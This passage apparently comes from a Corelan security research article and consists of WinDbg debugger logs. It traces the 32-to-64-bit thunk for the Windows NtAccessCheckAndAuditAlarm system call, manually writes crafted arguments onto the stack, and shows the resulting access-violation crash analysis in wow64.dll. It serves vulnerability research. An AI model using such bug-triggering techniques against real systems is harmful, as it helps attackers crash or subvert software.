0:000:x86> g wow64!whNtAccessCheckAndAuditAlarm+0x89\nwow64!whNtAccessCheckAndAuditAlarm+0x89:\n00000000`75435d31 3bd3 cmp edx,ebx<\/span>\n0:000> t\nwow64!whNtAccessCheckAndAuditAlarm+0x8b:\n00000000`75435d33 742c je wow64!whNtAccessCheckAndAuditAlarm+0xb9 (00000000`75435d61) [br=1]<\/span>\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xb9:\n00000000`75435d61 488bfb mov rdi,rbx\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xbc:\n00000000`75435d64 443bc3 cmp r8d,ebx<\/span>\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xbf:\n00000000`75435d67 742d je wow64!whNtAccessCheckAndAuditAlarm+0xee (00000000`75435d96) [br=1]<\/span>\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xee:\n00000000`75435d96 498bca mov rcx,r10<\/span>\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xf1:\n00000000`75435d99 e87251ffff call wow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC (00000000`7542af10)\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC:\n00000000`7542af10 4053 push rbx\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x2:\n00000000`7542af12 4883ec20 sub rsp,20h\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x6:\n00000000`7542af16 488bd9 mov rbx,rcx\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x9:\n00000000`7542af19 4885c9 test rcx,rcx<\/span>\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0xc:\n00000000`7542af1c 7507 jne wow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x15 (00000000`7542af25) [br=0]<\/span>\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0xe:\n00000000`7542af1e 33c0 xor eax,eax\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x10:\n00000000`7542af20 e986000000 jmp wow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x9b (00000000`7542afab)\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x9b:\n00000000`7542afab 4883c420 add rsp,20h\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x9f:\n00000000`7542afaf 5b pop rbx\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0xa0:\n00000000`7542afb0 c3 ret\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xf6:\n00000000`75435d9e 488bd0 mov rdx,rax\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xf9:\n00000000`75435da1 8b442468 mov eax,dword ptr [rsp+68h] ss:00000000`0008e2d8=0028ff70\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xfd:\n00000000`75435da5 448b5c2464 mov r11d,dword ptr [rsp+64h] ss:00000000`0008e2d4=000000a0\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x102:\n00000000`75435daa 448b542460 mov r10d,dword ptr [rsp+60h] ss:00000000`0008e2d0=00000098\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x107:\n00000000`75435daf 4c89542450 mov qword ptr [rsp+50h],r10 ss:00000000`0008e2c0=0000000077ab04f0\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x10c:\n00000000`75435db4 4c895c2448 mov qword ptr [rsp+48h],r11 ss:00000000`0008e2b8=000000000000008c\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x111:\n00000000`75435db9 4889442440 mov qword ptr [rsp+40h],rax ss:00000000`0008e2b0=0000000077ab04f0\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x116:\n00000000`75435dbe 44887c2438 mov byte ptr [rsp+38h],r15b ss:00000000`0008e2a8=8c\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x11b:\n00000000`75435dc3 4c89742430 mov qword ptr [rsp+30h],r14 ss:00000000`0008e2a0=0000000077ab04f0\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x120:\n00000000`75435dc8 44896c2428 mov dword ptr [rsp+28h],r13d ss:00000000`0008e298=82ac0004\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x125:\n00000000`75435dcd 4889542420 mov qword ptr [rsp+20h],rdx ss:00000000`0008e290=0000000077ab056c\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x12a:\n00000000`75435dd2 4c8bcb mov r9,rbx\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x12d:\n00000000`75435dd5 4c8bc7 mov r8,rdi\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x130:\n00000000`75435dd8 498bd4 mov rdx,r12\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x133:\n00000000`75435ddb 488bce mov rcx,rsi\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x136:\n00000000`75435dde ff15acb5feff call qword ptr [wow64!_imp_NtAccessCheckAndAuditAlarm (00000000`75421390)] ds:00000000`75421390={ntdll!ZwAccessCheckAndAuditAlarm (00000000`777a15a0)}\n0:000>\nntdll!ZwAccessCheckAndAuditAlarm:\n00000000`777a15a0 4c8bd1 mov r10,rcx\n0:000>\nntdll!ZwAccessCheckAndAuditAlarm+0x3:\n00000000`777a15a3 b826000000 mov eax,26h\n0:000>\nntdll!ZwAccessCheckAndAuditAlarm+0x8:\n00000000`777a15a8 0f05 syscall<\/pre>\n0:000:x86> ed 0028ff04 000000A0\n0:000:x86> ed 0028ff00 000000B0\n0:000:x86> ed 0028fefc 000000C0\n0:000:x86> ed 0028fef8 000000D0\n0:000:x86> ed 0028fef4 000000E0\n0:000:x86> ed 0028fef0 000000F0\n0:000:x86> ed 0028ff0c 00000000\n0:000:x86> ed 0028ff10 00000000\n0:000:x86> ed 0028ff14 00000000\n0:000:x86> ed 0028ff18 00000000\n0:000:x86> ed 0028ff1c 00000040\n0:000:x86> ed 0028ff20 00000050\n0:000:x86> ed 0028ff24 00000060\n0:000:x86> ed 0028ff28 00000070\n0:000:x86> ed 0028ff2c 00000080\n0:000:x86> ed 0028ff30 00000090\n0:000:x86> dds esp-1c\n0028feec 0028ff08\n0028fef0 000000f0\n0028fef4 000000e0\n0028fef8 000000d0\n0028fefc 000000c0\n0028ff00 000000b0\n0028ff04 000000a0\n0028ff08 0008f000\n0028ff0c 00000000\n0028ff10 00000000\n0028ff14 00000000\n0028ff18 00000000\n0028ff1c 00000040\n0028ff20 00000050\n0028ff24 00000060\n0028ff28 00000070\n0028ff2c 00000080\n0028ff30 00000090\n0:000:x86> g ntdll!ZwAccessCheckAndAuditAlarm\nntdll!ZwAccessCheckAndAuditAlarm:\n00000000`779615a0 4c8bd1 mov r10,rcx\n0:000> t\nntdll!ZwAccessCheckAndAuditAlarm+0x3:\n00000000`779615a3 b826000000 mov eax,26h\n0:000>\nntdll!ZwAccessCheckAndAuditAlarm+0x8:\n00000000`779615a8 0f05 syscall\n0:000>\nntdll!ZwAccessCheckAndAuditAlarm+0xa:\n00000000`779615aa c3 ret<\/pre>\n
0:000:x86> d 8f000\n0008f000 00000000<\/pre>\n
0:000:x86> u 9000\n00009000 ?? ???\n^ Memory access error in 'u 9000'<\/pre>\n
![\"windbg7\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/11\/windbg7_thumb.png\")
<\/a><\/p>\n0:000> u wow64!whNtAccessCheckAndAuditAlarm+0x67\nwow64!whNtAccessCheckAndAuditAlarm+0x5d:\n00000000`75145d05 33db xor ebx,ebx\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x5f:\n00000000`75145d07 3919 cmp dword ptr [rcx],ebx ds:00000000`0028ff08=0008f000\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x61:\n00000000`75145d09 7420 je wow64!whNtAccessCheckAndAuditAlarm+0x83 (00000000`75145d2b) [br=0])<\/pre>\n
![\"windbg8\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/11\/windbg8_thumb.png\")
<\/a><\/p>\n0:000> t\nwow64!whNtAccessCheckAndAuditAlarm+0x69:\n00000000`749d5d11 8b4104 mov eax,dword ptr [rcx+4] ds:00000000`00009004=????????\n0:000> t\n(bf8.308): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and<\/span> handled.\nwow64!whNtAccessCheckAndAuditAlarm+0x69:\n00000000`749d5d11 8b4104 mov eax,dword ptr [rcx+4] ds:00000000`00009004=????????\n0:000> !analyze -v\n*******************************************************************************\n* *\n* Exception Analysis *\n* *\n*******************************************************************************\n\nFAULTING_IP:\nwow64!whNtAccessCheckAndAuditAlarm+69\n00000000`749d5d11 8b4104 mov eax,dword ptr [rcx+4]\n\nEXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff)\nExceptionAddress: 00000000749d5d11 (wow64!whNtAccessCheckAndAuditAlarm+0x0000000000000069)\n ExceptionCode: c0000005 (Access violation)\n ExceptionFlags: 00000000\nNumberParameters: 2\n Parameter[0]: 0000000000000000\n Parameter[1]: 0000000000009004\nAttempt to read from address 0000000000009004\n\nFAULTING_THREAD: 0000000000000308\n\nDEFAULT_BUCKET_ID: INVALID_POINTER_READ\n\nPROCESS_NAME: image00000000`00400000\n\nERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not<\/span> be %s.\n\nEXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not<\/span> be %s.\n\nEXCEPTION_PARAMETER1: 0000000000000000\n\nEXCEPTION_PARAMETER2: 0000000000009004\n\nREAD_ADDRESS: 0000000000009004\n\nFOLLOWUP_IP:\nwow64!whNtAccessCheckAndAuditAlarm+69\n00000000`749d5d11 8b4104 mov eax,dword ptr [rcx+4]\n\nMOD_LIST: <ANALYSIS\/>\n\nNTGLOBALFLAG: 70\n\nAPPLICATION_VERIFIER_FLAGS: 0\n\nPRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ\n\nBUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ\n\nLAST_CONTROL_TRANSFER: from 00000000749ccf87 to 00000000749d5d11\n\nSTACK_TEXT:\n00000000`0008e270 00000000`749ccf87 : 00000000`0028ff00 00000000`0028ff00 00000000`7efdb000 00000000`7efdb000 : wow64!whNtAccessCheckAndAuditAlarm+0x69\n00000000`0008e350 00000000`74952776 : 00000000`774401c4 00000000`749c0023 00000000`00000246 00000000`0028fff0 : wow64!Wow64SystemServiceEx+0xd7\n00000000`0008ec10 00000000`749cd07e : 00000000`00000000 00000000`74951920 00000000`0008eea0 00000000`7727ecd1 : wow64cpu!TurboDispatchJumpAddressEnd+0x2d\n00000000`0008ecd0 00000000`749cc549 : 00000000`00000000 00000000`00000000 00000000`749c4ac8 00000000`7ffe0030 : wow64!RunCpuSimulation+0xa\n00000000`0008ed20 00000000`77294956 : 00000000`002c3600 00000000`00000000 00000000`77382670 00000000`77355978 : wow64!Wow64LdrpInitialize+0x429\n00000000`0008f270 00000000`77291a17 : 00000000`00000000 00000000`77294061 00000000`0008f820 00000000`00000000 : ntdll!LdrpInitializeProcess+0x17e4\n00000000`0008f760 00000000`7727c32e : 00000000`0008f820 00000000`00000000 00000000`7efdf000 00000000`00000000 : ntdll! ?? ::FNODOBFM::`string<\/span>'+0x29220\n00000000`0008f7d0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!LdrInitializeThunk+0xe\n\nSYMBOL_STACK_INDEX: 0\n\nSYMBOL_NAME: wow64!whNtAccessCheckAndAuditAlarm+69\n\nFOLLOWUP_NAME: MachineOwner\n\nMODULE_NAME: wow64\n\nIMAGE_NAME: wow64.dll\n\nDEBUG_FLR_IMAGE_TIMESTAMP: 4e212272\n\nSTACK_COMMAND: ~0s ; kb\n\nFAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_wow64.dll!whNtAccessCheckAndAuditAlarm\n\nBUCKET_ID: X64_APPLICATION_FAULT_INVALID_POINTER_READ_wow64!whNtAccessCheckAndAuditAlarm+69\n\nFollowup: MachineOwner<\/pre>\n![\"windbg9\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/11\/windbg9_thumb.png\")
<\/a><\/pre>\n
![\"windbg10\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/11\/windbg10_thumb.png\")
<\/a><\/p>\n